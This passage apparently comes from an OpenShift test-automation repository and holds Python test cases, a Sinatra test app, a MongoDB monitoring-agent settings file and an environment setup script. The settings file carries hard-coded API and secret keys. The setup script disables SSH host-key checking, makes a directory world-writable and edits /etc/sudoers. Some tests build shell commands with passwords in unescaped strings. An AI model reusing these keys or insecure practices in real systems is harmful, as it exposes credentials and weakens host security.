If it hangs forever, please terminate this script and test manually\")\n cmd = \"rm -f %s.tar.gz ; rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to save snapshot\")\n\n self.step(\"Destroy the app\")\n ret = common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"Failed to destroy app: %s\" % (self.app_name))\n\n self.step(\"Create a new app with the same name\")\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to re-create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Embed mysql to the new app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Use the snapshot tarball to restore it\")\n self.info(\"This step may take a very long time. If it hangs forever, please terminate this script and test manually\")\n cmd = \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to restore the new app\")\n\n self.step(\"Modify the git repo\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = \"cd '%s/php/' && git pull ; \\cp -f '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n cmd = \"cd '%s/src/main/webapp/' && git pull && cp -f '%s/app_template/bigdata/mysql/mysql.jsp' . && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = \"cd '%s/perl/' && git pull && cp -f '%s/app_template/bigdata/mysql/mysql.pl' . 
&& sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = \"cd '%s/wsgi/' && git pull && cp -f '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cd '%s/' && git pull && cp -f %s/app_template/bigdata/mysql/config.ru . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the git repo\")\n\n self.step(\"Check if the MySQL data is restored\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, [\"There are %s records in database\" % (self.record_count), \"This is testing data for testing snapshoting and restoring big data in mysql database\"],\n \"-H 'Pragma: no-cache' -L\", 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BigMysqlDataTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6936644911766052, "alphanum_fraction": 0.7242620587348938, "avg_line_length": 20.037878036499023, "blob_id": "cc8c48ac7074171d05cd37044ec043c3f197f8e7", "content_id": "30ce471232e440f45489e57d879bc4d2f90212f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 124, "num_lines": 132, "path": "/automation/open/testmodules/RT/cartridge/app_template/settings.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n(C) Copyright 2011, 10gen\n\nUnless instructed by 10gen, do not modify default settings.\n\nWhen upgrading your agent, you must also upgrade your settings.py file.\n\"\"\"\n\n#\n# Seconds between Mongo status checks. Please do not change this.\n#\ncollection_interval = 56\n\n#\n# Seconds between cloud configuration checks. Please do not change this.\n#\nconf_interval = 120\n\n#\n# Seconds between log data collection (if enabled in UI). 
Please do not change this.\n#\nlog_interval = 5\n\n#\n# The mms server\n#\nmms_server = \"https://mms.10gen.com\"\n\n#\n# The mms ping url\n#\nping_url = mms_server + \"/ping/v1/%s\"\n\n#\n# The mms config url\n#\nconfig_url = mms_server + \"/conf/v2/%(key)s?am=true&ah=%(hostname)s&sk=%(sessionKey)s&av=%(agentVersion)s&sv=%(srcVersion)s\"\n\n#\n# The mms agent version url\n#\nversion_url = mms_server + \"/agent/v1/version/%(key)s\"\n\n#\n# The mms agent upgrade url\n#\nupgrade_url = mms_server + \"/agent/v1/upgrade/%(key)s\"\n\n#\n# The mms agent log path.\n#\nlogging_url = mms_server + \"/agentlog/v1/catch/%(key)s\"\n\n#\n# Enter your API key - See: http://mms.10gen.com/settings\n#\nmms_key = \"0788b0eea2592b764695e7c7e8d7963a\"\n\nsecret_key = \"e25105c6674881bc13addc0415f80d53\"\n\nsrc_version = \"1a5750de968efe6307227591132b3967db0523ed\"\n\n#\n# Enabled by default\n#\nautoUpdateEnabled = True\n\n#\n# The global authentication credentials to be used by the agent.\n#\n# The user must be created on the \"admin\" database.\n#\n# If the global username/password is set then all hosts monitored by the\n# agent *must* use the same username password.\n#\n# Example usage:\n#\n# globalAuthUsername=\"\"\"yourAdminUser\"\"\"\n# globalAuthPassword=\"\"\"yourAdminPassword\"\"\"\n#\n#\n# If you do not use this, the values must be set to None.\n#\n# Please use \"\"\" quotes to ensure everything is escaped properly.\n#\n# E.g.,\n#\n# globalAuthPassword=\"\"\"yourAdminPasswordWith\"DoubleQuotes\"\"\"\n#\n# globalAuthPassword=\"\"\"yourAdminPasswordWith'SingleQuote\"\"\"\n#\n# For more information about MongoDB authentication, see:\n#\n# http://www.mongodb.org/display/DOCS/Security+and+Authentication\n#\n#\n\nglobalAuthUsername = None\n\nglobalAuthPassword = None\n\n#\n# Some config db collection properties\n#\nconfigCollectionsEnabled = True\nconfigDatabasesEnabled = True\n\n#\n# Set to a specific bind address or 0.0.0.0 for all interfaces. Set to None to disable.\n#\nshutdownAgentBindAddr = None\n\n#\n# You must change the shutdown port if you run multiple agents on a machine.\n#\nshutdownAgentBindPort = 23017\n\n#\n# The shutdown agent bind challenge. You can change this to whatever you like. 
When\n# you send a shutdown message to the agent, this must be the message sent.\n#\nshutdownAgentBindChallenge = '23237NYouCanChangeThis'\n\nsettingsAgentVersion = \"1.4.2\"\n\nuseSslForAllConnections = False\n\n# Set to False if you have no plans to use munin (saves one thread per server)\nenableMunin = True\n\n# Misc - Please do not change this.\nsocket_timeout = 40\n\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6904761791229248, "avg_line_length": 24, "blob_id": "aee96f876fd0858bad640e7b68001f538340909b", "content_id": "a50ae61ea85fa7ab16c99ebebde6c9e670323485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 168, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/automation/open/Longevity/cartridge/insert.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "mysql <<EOF\nuse $1\ncreate table test(id int(8), name char(20));\ninsert into test values('0','openshift');\ninsert into test values('1','nsun');\nselect * from test;\nEOF\n" }, { "alpha_fraction": 0.6473214030265808, "alphanum_fraction": 0.6596638560295105, "avg_line_length": 28.984251022338867, "blob_id": "17b08eba6a3d49ff6271c04029d361a4ee36de01", "content_id": "73091f937eea91f571f0d2862cad1b37db2bd5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 425, "num_lines": 127, "path": "/automation/open/bin/setup_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n\nif [ -z \"$1\" ]; then\n    echo \"ERROR: Missing argument.\"\n    echo \"Usage: $0 <RHTEST_HOME directory>\"\n    exit 2\nfi\n\necho \"Please note this script won't be able to install rhc on Fedora 17\"\necho \"Warning: This script will change your kerberos configuration, bashrc, bash_profile and ssh configuration.\"\necho \"Continue?(yes/no)\"\nread answer\nif [ \"$answer\" != \"yes\" ];then\n    exit 1\nfi\n\n\nRHTEST_HOME=$1\nTEST_USER=$USER\nPACKAGES_TO_INSTALL=\"git rhc pexpect python-sqlobject expect firefox chromium postgresql postgresql-devel rubygem-rails perl-ExtUtils-MakeMaker perl-Module-Build maven3 gcc-c++ rubygem-sqlite3 rubygem-rack-mount sqlite-devel rubygem-pg mongodb krb5-workstation httpd-tools python-pip python-paramiko python-kerberos python-selenium python-httplib2 java-1.7.0-openjdk ruby-devel python-devel perl-devel mysql-devel spawn make\"\n\n#if [ \"root\" == \"$TEST_USER\" ]; then\n#    echo \"ERROR: You must not be the superuser. 
\"\n# exit 3;\n#fi\n\nsudo touch /tmp || ( echo \"ERROR: SUDO is not configured properly for this user.\"; exit 3; )\n\nset -e\n\n########################\n### APP/LIBS setup ###\n########################\nsudo cp $RHTEST_HOME/etc/repo_key/li.repo /etc/yum.repos.d/\nsudo cp $RHTEST_HOME/etc/repo_key/client-cert.pem /var/lib/yum/client-cert.pem\nsudo cp $RHTEST_HOME/etc/repo_key/client-key.pem /var/lib/yum/client-key.pem\n\n### install all necessary libraries ###\nsudo yum -y --skip-broken update \nsudo yum -y --skip-broken install $PACKAGES_TO_INSTALL\nsudo pip-python install itimer mysql-python sqlobject\n\n########################\n### setup SSH config ###\n########################\n\nmkdir -p $HOME/.ssh\ncp -f $RHTEST_HOME/etc/libra.pem $HOME/.ssh/\nSSH_CONFIG=$HOME/.ssh/config\ntouch $SSH_CONFIG\nif [ -z \"$(grep OPENSHIFT_SETUP $SSH_CONFIG)\" ]; then\n cat <<'EOF' >> $SSH_CONFIG\n### OPENSHIFT_SETUP ###\nHost *.amazonaws.com\n User root\n IdentityFile ~/.ssh/libra.pem\n\nHost *.dev.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/dev_rhcloud_known_hosts\n\nHost *.rhcloud.com\n VerifyHostKeyDNS yes\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/rhcloud_known_hosts\n\nEOF\nchmod 0600 $SSH_CONFIG\nfi\n\n########################\n### Kerberos setup #####\n########################\n\nsudo cp -f /etc/krb5.conf{,_backup}\nsudo cp -f $RHTEST_HOME/etc/krb5.conf_example /etc/krb5.conf\n\n########################\n### FRAMEWORK setup ####\n########################\nRUBY_VER=`ruby -v | cut -d' ' -f 2 | cut -d '.' -f 1-2 | tr -d '\\n'`\nGEM_HOME=\"/usr/lib/ruby/gems/$RUBY_VER\"\ntouch $HOME/.bash_profile\nif [ -z \"$(grep OPENSHIFT_SETUP $HOME/.bash_profile)\" ]; then\n echo \"GEM_HOME=$GEM_HOME\" >> $HOME/.bash_profile\n echo 'RHTEST_HOME=$RHTEST_HOME' >> $HOME/.bash_profile\n echo 'PYTHOPATH=$RHTEST_HOME/lib:$RHTEST_HOME/lib/supports:$RHTEST_HOME/testmodules/' >> $HOME/.bash_profile\n echo 'PATH=$PATH:$RHTEST_HOME/bin' >> $HOME/.bash_profile\nfi\n\nRESULTS_DIR=/var/www/html/testresults/\nsudo mkdir -p $RESULTS_DIR\nsudo chmod 777 $RESULTS_DIR\nsudo setfacl -d -m other::rwx $RESULTS_DIR\n\n########################\n### OPENSHIFT setup ####\n########################\nif [ ! 
-f $HOME/.openshift/express.conf ]; then\n mkdir -p $HOME/.openshift\n cat <<EOF >$HOME/.openshift/express.conf\n\nlibra_server=stg.openshift.redhat.com\n\nEOF\n\nfi\n\nsudo gem install bundle\n#REDIS dependencies\nsudo gem install mail -v '2.2.19'\nsudo gem install rack -v '1.4.1'\nsudo gem install therubyracer\nsudo gem install execjs\nsudo gem install rack-mount -v '0.8.3'\nsudo gem install pg\nsudo gem install redis -v '3.0.1'\nsudo gem install thread-dump -v '0.0.5'\n\n#\n#for jenkins working with sudo we must disable using `requiretty` in /etc/sudoers\n#\nsudo sed -i -e 's/^\\(Defaults\\s\\+requiretty\\)/#\\1/' /etc/sudoers\nexit 0\n" }, { "alpha_fraction": 0.7055476307868958, "alphanum_fraction": 0.7197723984718323, "avg_line_length": 24.10714340209961, "blob_id": "0f82b1a46d24ca84a4288864de698b08caee00d1", "content_id": "cacb70290d72dd146e453ef73c7cea5e2fd1fe3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass EAPHotDeployWithoutJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbosseap']\n self.config.summary = \"[US2422] Hot deployment support for JBoss EAP6 - without Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5402504205703735, "alphanum_fraction": 0.5491949915885925, "avg_line_length": 22.25, "blob_id": "63b9889ccc6fcc4e5df840e9628d9672d60a5244", "content_id": "f73429312c51818e65ce5dde68b23990b57d540b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 559, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/automation/open/testmodules/RT/cucumber/step_definitions/client_steps.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Given /^an accepted node$/ do\n accept_node = \"/usr/bin/rhc-accept-node\"\n File.exists?(accept_node).should be_true\n num_tries = 10\n (1..num_tries).each do |i|\n begin\n pass = `sudo #{accept_node}`.chomp \n exit_status = $?.exitstatus\n \n if i == num_tries\n puts pass if pass != \"PASS\"\n puts \"Exit status = #{exit_status}\" if exit_status != 0\n end\n \n exit_status.should be(0)\n pass.should == \"PASS\"\n break\n rescue Exception => e\n if i == num_tries\n raise\n end\n end\n end\nend\n\n" }, { "alpha_fraction": 0.5807743668556213, "alphanum_fraction": 0.6081441640853882, "avg_line_length": 23.145160675048828, "blob_id": "39d45e8c8e94d04df1003f6aa3e9de77b72d4f6e", "content_id": "9f78b8327866c1ffdc29e7a9177b3baae26a8b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 85, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_122244.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# 
coding=utf-8\n#\n# File name: case_122244.py\n# Date: 2012/07/04 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Login_invalid_password(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n time.sleep(5)\n \n #Login using invalid password.\n web.assert_text_equal_by_xpath('SIGN IN',\n '''//div[@id='top']/div/div[2]/a''')\n web.click_element_by_xpath('''//div[@id='top']/div/div[2]/a''')\n web.input_by_id(\"web_user_rhlogin\", \"yujzhang\")\n web.input_by_id(\"web_user_password\", \"123\")\n web.click_element_by_xpath('''//form[@id='login_form']/fieldset/input''')\n time.sleep(10)\n web.assert_text_equal_by_xpath('The supplied login or password was invalid.',\n '''//form[@id='login_form']/ul/li''')\n\n self.tearDown()\n\n return self.passed(\"Case 122244 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Login_invalid_password)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122244.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6035182476043701, "alphanum_fraction": 0.6165990233421326, "avg_line_length": 41.63461685180664, "blob_id": "0757476d2c91e4d305762553a1fa5260c578595e", "content_id": "ff49297f55840f2da15d2dcf723728e051827467", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2217, "license_type": "no_license", "max_line_length": 231, "num_lines": 52, "path": "/automation/open/prepare_testing_data/data/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\nrequire 'rubygems'\nrequire 'bundler'\nrequire 'mysql'\n\nBundler.require\n\n\nget '/' do\n \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\nend\n\nget '/mysql' do\n dbh = Mysql.real_connect(\"#host\",\"#user\",\"#passwd\",\"#dbname\",port=#port)\n dbh.query(\"CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));\")\n dbh.query(\"COMMIT;\")\n action = request.params().fetch(\"action\", \"\")\n size = request.params().fetch(\"size\", \"5000\")\n if action == \"insert\"\n dbh.query(\"SET autocommit=0;\")\n for i in 1..size.to_i()\n dbh.query(\"INSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\")\n end\n dbh.query(\"COMMIT;\")\n dbh.query(\"SET autocommit=1;\")\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />\" + size + \" records have been inserted into mysql<br />\"]\n elsif action == \"delete\"\n dbh.query(\"DELETE FROM info;\")\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />All the records have been deleted from mysql database<br />\"]\n elsif action == \"show\"\n res = dbh.query(\"SELECT COUNT(*) FROM info;\")\n count = res.fetch_row()[0]\n if count.to_i() == 0\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There is no record in database<br />\"]\n else\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There are \" 
+ count + \" records in database<br />\"]\n end\n if count.to_i() != 0\n res = dbh.query(\"SELECT * FROM info LIMIT 0, 1;\")\n row = res.fetch_row()\n response_body[1] += \"Here is one row: \" + row[1]\n end\n else\n response_body = \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\n end\n dbh.query(\"COMMIT;\")\n dbh.close()\n return response_body\nend\n\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6561630964279175, "alphanum_fraction": 0.6561630964279175, "avg_line_length": 21.47916603088379, "blob_id": "a44ac4c38adcae4cde465ee5f76bfdac8a8e9734", "content_id": "2e3dc9da170eb362ff1ad7e92fa0462bb1d554b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 76, "num_lines": 48, "path": "/automation/resultchecker.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"Get all info from output XML file.\n\nAdditionly, this modle can be expanded\nfor reading/checking all test execution result from an output XML file.\n\nOptional `outpath` specifies where to write processed results. If not given,\nresults are written over the original file.\n\nAuthor: xin Gao <[email protected]>\n\"\"\"\n\nfrom robot.api import ExecutionResult, ResultVisitor\n\n\nclass ResultChecker(ResultVisitor):\n\n def __init__(self):\n pass\n\n def visit_test(self, test):\n \"\"\"\n test attrs:\n test.name, test.status, test.message,\n test.doc, test.tags, test.timeout\n test.starttime, test.endtime\n \"\"\"\n #print 'the test name is: ', test.name\n TEST_NAMES.append(test.name)\n\n\nTEST_NAMES = []\n\n\ndef get_all_casenames(output_path):\n \"\"\"\n method for getting all tests name.\n \"\"\"\n result = ExecutionResult(output_path)\n result.visit(ResultChecker())\n return TEST_NAMES\n\n\nif __name__ == '__main__':\n OUTPUT_PATH = 'robotdemo/output.xml'\n TESTS = get_all_casenames(OUTPUT_PATH)\n print TESTS\n" }, { "alpha_fraction": 0.6882989406585693, "alphanum_fraction": 0.7020648717880249, "avg_line_length": 28.852941513061523, "blob_id": "d7c2cc4596f55b25a5ebf2099b703f4e18ff9e66", "content_id": "5a3694eca05e2b033076e29282a739d32a78929d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 71, "num_lines": 34, "path": "/automation/open/lib/reports/Eventlog.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nA report type that produces an event log with time stamps.\n\n\"\"\"\n\nimport reports\nimport timelib\nnow = timelib.time\n\n\nclass LogFormatter(reports.StandardFormatter):\n\tMIMETYPE = \"text/plain\"\n\n\tdef message(self, msgtype, msg, level=1):\n\t\treturn \"%s:%s: %s\\n\" % (now(), msgtype, msg)\n\n\t# no summary for logs\n\tdef summary(self, text):\n\t\treturn \"%s:%s:\\n\" % (now(), \"SUMMARY\")\n\n\n" }, { "alpha_fraction": 0.5840597748756409, "alphanum_fraction": 0.5921115875244141, "avg_line_length": 48.23584747314453, "blob_id": "bc1fa11c911e7212f28165c323b6a43ca313e800", "content_id": "51676b84561dbc3244006639f93379d6651849fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10439, "license_type": "no_license", "max_line_length": 310, "num_lines": 212, "path": "/automation/open/testmodules/UI/web/case_141718.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165717.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CheckOpensourcePage(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n\n        web.create_app(\"python-2.6\",\"python\")\n        web.click_element_by_xpath('''//a[contains(@href, '/app/console/help')]''')\n        time.sleep(2)\n\n        #check the \"Create an app now\" link \n        web.assert_text_equal_by_xpath(\"Create an app now\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[3]/a''')\n        web.click_element_by_link_text(\"Create an app now\")\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''cartridges''','''//div[@id='content']/div/div/div/div[2]/div/section/p/strong''') \n        web.go_back()\n        #check the \"our Getting Started page\" link \n        web.assert_text_equal_by_xpath(\"our Getting Started page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[4]/a''')\n        web.click_element_by_link_text(\"our Getting Started page\")\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div/div/div/h1''') \n        web.go_back()\n        #check the \"Get Started Fast page\" link \n        web.assert_text_equal_by_xpath(\"Get Started Fast page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a''')\n        web.click_element_by_link_text(\"Get Started Fast page\")\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''Get Started on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n        web.go_back()\n        #check the \"Ruby on Rails\" link \n        web.assert_text_equal_by_xpath(\"Ruby on Rails\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[3]''')\n        web.click_element_by_link_text(\"Ruby on Rails\")\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''rails-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n        web.go_back()\n        #check the \"Drupal\" link \n        web.assert_text_equal_by_xpath(\"Drupal\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[2]''')\n        web.click_element_by_link_text(\"Drupal\")\n        time.sleep(2)\n        web.assert_text_equal_by_xpath('''drupal-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n        web.go_back()\n        #check the \"Wordpress\" link \n        web.assert_text_equal_by_xpath(\"Wordpress\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[4]''')\n        
web.click_element_by_link_text(\"Wordpress\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''wordpress-example''','''//body/div/div[2]/div/div/div/h1/strong/a''') \n web.go_back()\n #check the \"let us know\" link \n web.assert_text_equal_by_xpath(\"let us know\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[5]''')\n web.assert_text_equal_by_xpath(\"let us know\",'''//a[contains(@href, 'mailto:[email protected]')]''')\n\n #check the \"The Developer Center\" link \n web.assert_text_equal_by_xpath(\"The Developer Center\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[2]/a''')\n web.click_element_by_link_text(\"The Developer Center\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Developer Center''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"the User Guide\" link \n web.assert_text_equal_by_xpath(\"the User Guide\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[3]/a''')\n web.click_element_by_link_text(\"the User Guide\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''User Guide''','''//div[@id='id2789633']/div/div/div[2]/h1''') \n web.go_back()\n #check the \"JBoss\" link \n web.assert_text_equal_by_xpath(\"JBoss\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[4]/a''')\n web.click_element_by_link_text(\"JBoss\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Resources for JBoss''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"MongoDB\" link \n web.assert_text_equal_by_xpath(\"MongoDB\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[4]/a[2]''')\n web.click_element_by_link_text(\"MongoDB\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Building with MongoDB''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"see our Videos page\" link \n web.assert_text_equal_by_xpath(\"see our Videos 